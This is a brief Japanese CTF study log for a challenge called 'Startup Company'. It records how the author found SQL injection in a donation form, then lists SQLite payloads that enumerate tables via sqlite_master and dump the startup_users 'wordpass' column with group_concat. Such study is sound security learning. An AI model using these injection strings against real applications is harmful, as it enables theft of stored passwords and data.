できなかった問題をwriteup等を参考に勉強した記録を残す。
Startup Company
Register のリンクから登録して
ログインすると,寄付を募るページ
1ドル寄付してみた
'を入力してみた
チェック処理がある
Fiddlerで'を送ってみる
Database error -> SQLiの可能性アリ
ヒント
sqlite
SQLiがとおるか?
moneys='||(select sqlite_version()) --
テーブル数確認
moneys='||(select count(*) from sqlite_master where type = "table") --
テーブル名確認(複数テーブルがあったときに備えてlimit使用)
moneys='||(select name from sqlite_master where type = "table" limit 0,1) --
テーブル作成時のsql確認
moneys='||(select sql from sqlite_master where name = "startup_users") --
wordpassにフラグが入ってそう。
件数を数えてみる
moneys='||(select count(*) from startup_users) --
多いな
limit だと39回か。しんどい。
moneys='||(select group_concat(wordpass) from startup_users) --
limitでも7回目で成功するように仕込んでる。